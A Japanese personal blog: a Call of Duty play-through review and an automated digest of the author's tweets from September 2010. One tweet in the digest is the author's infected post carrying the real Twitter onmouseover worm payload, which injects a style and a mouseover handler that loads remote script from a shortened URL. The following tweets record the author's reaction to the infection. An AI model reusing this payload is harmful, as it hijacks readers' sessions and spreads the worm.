2010年09月22日

「Call of Duty」クリア



案外、あっさりとクリアしてしまいました。
こちらの1も十分、良くできていると思いますが、この続編のCOD2は、正しく進化していたなぁとしみじみ思います。

今回は、ハードでプレー、敵の反応が良くて中々に厳しかった。
いつもなら全難易度プレーするのですが、これは古いゲームなので、早々に次のゲームに移る事にするかな。

COD名物イベントの規定の時間内、陣地を死守するイベントが相変わらず難しい。
安全地帯見つけられたので、良かったですが、普通に戦っていたら無理なのでは無かろうか。
shot0043.jpg
ここでずっと伏せてました、しかし、いつきても良いように絶えず集中しておりましたが。
そして、相変わらず救援部隊が来ると頼もしい気持ちになる。

死守した後の光景、死屍累々。
shot0046.jpg

アメリカ編が「プライベートライアン」でソ連編が「スターリングラード」ですな。
そして拡張版が「バンド・オブ・ブラザーズ」。
映像を見てからゲームをやれば、あぁこの場面、映画で見たなぁと臨場感もって楽しめるし、ゲームをやってからでも、あぁこの場面、ゲームで見たなぁと臨場感もって楽しめます。
良い関係です。


塹壕
shot0011.jpg

こういう小道具がまた良いんだ。
shot0014.jpg

毎度おなじみのおっちゃん。
shot0015.jpg
影の主役ですな。

グライダーに乗ってます。
shot0020.jpg
飛行機に引っ張られて発進し、途中で切り離されて敵地に侵入。
着陸は胴体着陸、中々に強引な乗り物です。

綺麗だなぁ。
shot0023.jpg

ソ連編。
映画「スターリングラード」まんまだ。
shot0032.jpg
逃げ出そうと海中に飛び込んで、将校らしき人に射殺される場面もあります。

荒地。
shot0036.jpg

ドイツへ。
shot0053.jpg
空襲で街は、ボロボロです。

最後は国会。
shot0058.jpg
ラスボスにヒトラーは、出てきません。

次は、拡張版の「Call of Duty - United Offensive 」をプレーします。
posted by 妖怪尽くし at 21:45 | Comment(0) | TrackBack(0) | GAME | このブログの読者になる | 更新情報をチェックする

2010年09月22日

2010年09月21日のつぶやき



youkaizukushi / 妖怪尽くし
良いですな RT @tikutaku これはいい 新ファインダーシステム搭載の高級コンパクトデジカメ「FinePix X100」 - ITmedia デジカメプラス http://bit.ly/altBE1 at 09/21 14:13

youkaizukushi / 妖怪尽くし
東博行くなら昨日だったよなぁ。餓鬼草紙、平常展が無料、図録フェア。 at 09/21 14:14


youkaizukushi / 妖怪尽くし
アニメーション監督、アニメーターである北久保宏之さんのツイートが興味深い http://twitter.com/LawofGreen at 09/21 15:53

youkaizukushi / 妖怪尽くし
下位機種の通信ゲームも、一眼に抵抗を感じている人を取り込む為の攻めの姿勢に思えてきたぞ|ペンタックス、最高連写7コマ/秒のデジタル一眼レフ「K-5」を国内発表 http://bit.ly/dn1U2H at 09/21 16:00

youkaizukushi / 妖怪尽くし
小学校の頃、絵でも習字でも大胆に用紙一杯に大きく描くと先生のウケが良いというのが、子供心に分かった。大きかろうが小さかろうが良いと思うのだが。そういう風な基準を作った方が効率が良いんだろう。 at 09/21 18:59


youkaizukushi / 妖怪尽くし
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl5d3')"/ at 09/21 20:25

youkaizukushi / 妖怪尽くし
ツイッターの感染したみたいなんだけど、対策あるのかな…。 at 09/21 20:51

youkaizukushi / 妖怪尽くし
とりあえずログアウトして、非公式のついっぷるに。今
そこにある危機。
 at 09/21 21:07

youkaizukushi / 妖怪尽くし
「ついっぷる」の方が便利そうだな、これを機にこちらに。などと悠長な事を言っている場合なのか^^; at 09/21 21:09

youkaizukushi / 妖怪尽くし
COD。アメリカ編が「バンド・オブ・ブラザース」でソビエト編が「スターリングラード」まんまだ。ただデキが良いので私的には文句無し。お互いの作品で補完関係にもなる。ゲームをしていれば、より映像が楽しめるし、映像をみていれば、よりゲームが楽しめる。 at 09/21 21:24

youkaizukushi / 妖怪尽くし
私のは、一部文字が拡大された感じだったけど、文字がバラバラになるのもあるのか!?これは恐い。 at 09/21 21:27

youkaizukushi / 妖怪尽くし
酷いなぁ。|郵便不正事件、データ改ざんの大阪地検特捜部主任検事を逮捕 http://news.tv-asahi.co.jp/news/web/html/200921036.html at 09/21 21:30

youkaizukushi / 妖怪尽くし
なんと!恐い RT @ibuliz01i 文字にマウスオーバーすると勝手にツイート→次の人へ連鎖みたいですね at 09/21 21:32

youkaizukushi / 妖怪尽くし
フォロワーの方から変なツイートが来てる…、ついっぷるだから大丈夫なのか。 at 09/21 21:33
posted by 妖怪尽くし at 00:01 | Comment(0) | TrackBack(0) | Twitter | このブログの読者になる | 更新情報をチェックする